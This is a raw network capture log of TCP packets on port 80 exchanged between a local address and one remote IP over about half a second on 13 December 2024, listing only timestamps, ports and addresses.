Dec 13, 2024 01:37:14.923466921 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.923515081 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.924283981 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.924348116 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.924393892 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.925173044 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.925278902 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.925331116 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.926095963 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.926279068 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.926326036 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.927012920 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.927108049 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.927164078 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.927894115 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.927989960 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.928039074 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.928803921 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.928987980 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.929038048 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.929716110 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.929833889 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.929883003 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.930625916 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.930840969 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.930891991 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.931556940 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.931644917 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.931690931 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.932431936 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.932538033 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.932589054 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.933365107 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.933473110 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.933521032 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.934263945 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.934396029 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.934443951 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.935158968 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.935281992 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.935327053 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.936115026 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.936222076 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.936269045 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.936989069 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.937097073 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.937148094 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.937899113 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.938088894 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.938141108 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.938793898 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.938896894 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.938944101 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.939698935 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.939812899 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.939857960 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.940618992 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.940737963 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.940790892 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.941536903 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.941592932 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.941665888 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.942455053 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.942605019 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.942672968 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.943370104 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.943479061 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.943531036 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.944259882 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.944390059 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.944545984 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.945235014 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.945298910 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.945355892 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.946106911 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.946201086 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.946245909 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.947025061 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.947122097 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.947166920 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.947952032 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.948082924 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.948127031 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.948837042 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.948961973 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.949008942 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.949731112 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.949841022 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.949889898 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.950629950 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.950751066 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.950798988 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.951590061 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.951670885 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.951783895 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.952476978 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.952557087 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.952604055 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.953372002 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.953499079 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.953550100 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.954309940 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.954380035 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.954427958 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.955132008 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.004666090 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.099869013 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.099894047 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.099972963 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.100003958 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.100100040 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.100162029 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.100940943 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.101047993 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.101144075 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.101839066 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.101933956 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.101990938 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.102760077 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.102853060 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.102916002 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.103671074 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.103754997 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.103806019 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.104573965 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.104687929 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.104765892 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.105462074 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.105575085 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.105631113 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.106372118 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.106487989 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.106585979 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.107285976 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.107443094 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.107491970 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.108206034 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.108314037 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.108361959 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.109119892 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.109213114 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.109262943 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.110032082 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.110127926 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.110208988 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.110924959 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.111053944 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.111099958 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.111835003 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.111948013 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.111994982 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.112768888 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.112859964 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.112910986 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.113651037 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.113779068 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.113830090 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.114567041 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.114691019 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.114738941 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.115468979 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.115576029 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.115627050 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.116393089 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.116416931 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.116759062 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.117315054 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.117434978 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.117628098 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.118207932 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.118329048 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.118382931 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.119096041 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.119229078 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.119277000 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.120031118 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.120141983 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.120197058 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.120950937 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.121022940 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.121074915 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.121870995 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.122070074 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.122117043 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.122770071 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.122911930 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.122957945 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.123724937 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.123809099 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.123929024 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.124603987 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.124736071 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.124838114 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.125514030 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.125622988 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.125672102 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.126410007 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.126477957 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.127063036 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.127358913 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.127451897 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.127505064 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.128290892 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.128340960 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.128478050 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.129156113 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.129237890 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.129390001 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.130042076 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.130151987 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.130521059 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.130964994 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.131056070 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.131109953 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.131865025 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.131980896 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.132067919 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.132771015 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.132914066 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.133028030 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.133655071 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.133780003 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.133831024 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.134579897 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.134690046 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.135163069 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.135492086 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.135608912 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.135663033 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.136409998 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.136521101 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.136745930 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.137320995 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.137432098 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.138231993 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.138287067 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.138324976 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.138370037 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.139139891 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.139235020 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.140043020 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.140099049 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.140145063 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.140187025 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.140957117 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.141066074 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.141122103 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.141855001 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.141987085 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.142765045 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.142828941 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.142870903 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.142913103 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.143693924 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.143743038 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.144593954 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.144649982 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.144694090 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.144747972 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.145518064 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.145623922 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.145680904 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.146406889 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.146518946 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.146573067 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.147273064 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.192199945 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.291682959 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.291805983 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.291861057 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.292068005 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.292207003 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.292257071 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.292989969 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.293065071 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.293122053 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.293885946 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.293998957 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.294085979 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.294787884 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.294899940 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.294951916 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.295690060 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.295820951 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.295874119 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.296617985 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.296706915 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.296757936 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.297539949 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.297677040 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.297729015 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.298439980 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.298558950 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.298624039 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.299371958 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.299455881 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.299513102 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.300260067 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.300385952 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.300431967 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.301188946 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.301311016 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.301359892 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.302107096 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.302215099 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.302297115 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.302983046 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.303093910 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.303147078 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.304094076 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.304234028 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.304285049 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.304790020 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.304918051 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.304966927 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.305699110 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.305818081 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.305869102 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.306618929 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.306732893 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.306782961 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.307543039 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.307663918 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.307713985 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.308434963 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.308520079 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.308568954 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.309345007 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.309436083 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.309526920 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.310247898 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.310379982 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.310431004 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.311177969 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.311461926 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.311525106 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.312062979 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.312114000 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.312161922 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.312994957 CET	80	49707	185.81.68.147	192.168.2.5
